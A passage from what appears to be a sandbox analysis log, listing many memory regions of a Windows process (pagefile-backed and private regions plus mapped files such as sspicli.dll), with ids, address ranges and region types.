entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1223 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1224 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1225 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1226 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1227 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1228 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1229 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1230 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1231 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1232 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1233 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1234 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1235 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1236 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1237 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1238 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1239 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1240 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1241 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1242 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1243 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1244 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1245 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1246 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1247 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1248 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1249 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1250 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1251 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1252 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1253 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1254 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1266 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1267 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1268 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1269 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1270 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1271 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1272 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1273 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1274 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1275 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1276 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1277 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1278 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1279 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1280 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1281 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1282 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1283 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1284 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1285 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1286 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1287 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1288 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1289 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1290 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4130 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x3a0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 4332 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 4333 start_va = 0x17e0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017e0000" filename = "" Region: id = 4334 start_va = 0x1bf0000 end_va = 0x1ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 4335 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 4336 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4337 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4338 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4339 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4340 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4341 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4342 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4343 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4344 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4345 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4346 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4347 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4348 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4349 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4350 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4351 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4352 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4353 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4354 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4355 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4356 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4357 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4358 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4359 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4360 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4361 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4362 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4363 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4383 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4384 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4385 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4386 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4387 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4388 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4389 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4390 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4391 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4392 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4393 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4394 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4395 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4396 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4397 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4398 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4399 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4400 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4401 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4402 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4403 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4404 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4405 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4406 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4407 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4527 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 4528 start_va = 0x17e0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017e0000" filename = "" Region: id = 4529 start_va = 0x1bf0000 end_va = 0x1ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 4530 start_va = 0x3e0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 4531 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4532 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4533 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4534 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4535 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4536 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4537 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4538 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4539 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4540 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4541 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4542 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4543 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4544 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4545 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4546 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4547 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4548 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4549 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4550 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4551 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4552 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4553 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4554 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4555 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4556 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4557 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4558 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4559 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4560 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4561 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4562 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4563 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4564 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4565 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4566 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4567 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4568 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4569 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4570 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4571 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4653 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4654 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4655 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4656 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4657 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4658 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4659 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4660 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4661 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4662 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4663 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4664 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4665 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4666 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6734 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 6735 start_va = 0x17e0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017e0000" filename = "" Region: id = 6736 start_va = 0x1bf0000 end_va = 0x1ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 6737 start_va = 0x3e0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 6738 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6739 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6740 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6741 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6742 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6743 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6744 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6745 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6746 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6747 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6748 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6749 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6750 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6751 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6752 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6753 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 6754 start_va = 0x3d0000 